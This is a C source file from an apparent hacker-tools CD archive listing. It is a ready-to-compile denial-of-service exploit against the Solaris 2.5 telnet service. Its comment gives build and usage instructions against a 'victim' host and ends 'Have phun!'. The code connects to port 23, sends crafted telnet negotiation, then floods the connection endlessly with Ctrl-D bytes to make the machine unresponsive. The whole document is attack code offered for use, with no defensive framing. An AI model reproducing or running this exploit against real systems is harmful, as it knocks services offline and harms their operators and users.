home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / solaris_telnet.c < prev    next >
C/C++ Source or Header  |  2001-11-06  |  2KB  |  93 lines
  1.  
  2. /*  Here is a little proggie reputed to make Solaris 2.5 machines
  3. **  totally unresponsive for the duration of the attack.  You need
  4. **  a real internet connection from the attacker to the victim,
  5. **  but very little bandwidth is required to keep the victim "down 'n
  6. **  out" once the attack is underway.  If the output of dots stops
  7. **  for long pauses, the attack is working.  If the dots keep coming
  8. **  fast or you get a SIGPIPE, the attack didn't work.
  9. **
  10. **  The victim must offer a login prompt on port 23.
  11. **
  12. **  This isn't 100% -- some machines resist, and you may have to try
  13. **  multiple times on some machines, but with a few tries most 2.5
  14. **  machines seem to bite it hard.
  15. **
  16. **  To make, if your system is BSD'ish:  gcc <thisfile>
  17. **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
  18. **
  19. **  Usage: a.out <victim's hostname>
  20. **
  21. **  Have phun!
  22. */
  23.  
  24. #include <signal.h>
  25. #include <sys/types.h>
  26. #include <sys/socket.h>
  27. #include <netinet/in.h>
  28. #include <netdb.h>
  29. #include <arpa/telnet.h>
  30. #include <string.h>
  31. #include <unistd.h>
  32.  
  33. #define BUFSIZE 100
  34. #define DOTS
  35.  
  36. void catchit(void)
  37. {
  38.     printf("\nCaught SIGPIPE -- your link may be too slow.\n");
  39.     exit(1);
  40. }
  41.  
  42. int main(int argc, char *argv[])
  43. {
  44.     unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
  45.     TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
  46.     TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};
  47.  
  48.     unsigned char nastybuf[BUFSIZE];
  49.     struct sockaddr_in sin;
  50.     struct servent *sp;
  51.     struct hostent *hp;
  52.     int s;
  53.  
  54.     typedef void (*sig_t) (int);
  55.     signal(SIGPIPE,(sig_t)catchit);
  56.  
  57.     memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */
  58.  
  59.     if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
  60.           printf("no socket\n");
  61.           exit(1);
  62.     }
  63.  
  64.     if (!(hp = gethostbyname(argv[1]))) {
  65.         printf("unknown host\n");
  66.         exit(1);
  67.     }
  68.  
  69.     bzero(&sin,sizeof(sin));
  70.     bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
  71.     sin.sin_family = AF_INET;
  72.     sp = getservbyname("telnet","tcp");
  73.     sin.sin_port = sp->s_port;
  74.  
  75.     if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
  76.         printf("can't connect to host\n");
  77.         exit(1);
  78.     }
  79.  
  80.     printf("connected to %s\n",argv[1]);
  81.     write(s,kludge_telopt,21);   /* kludge some telnet negotiation */
  82.  
  83.     /*  "Let them eat ^Ds..." */
  84.  
  85.     while (write(s,nastybuf,BUFSIZE) != -1) {
  86.  
  87. #ifdef DOTS
  88.         write(STDOUT_FILENO,".",1);
  89. #endif
  90.     }
  91. }
  92.  
  93.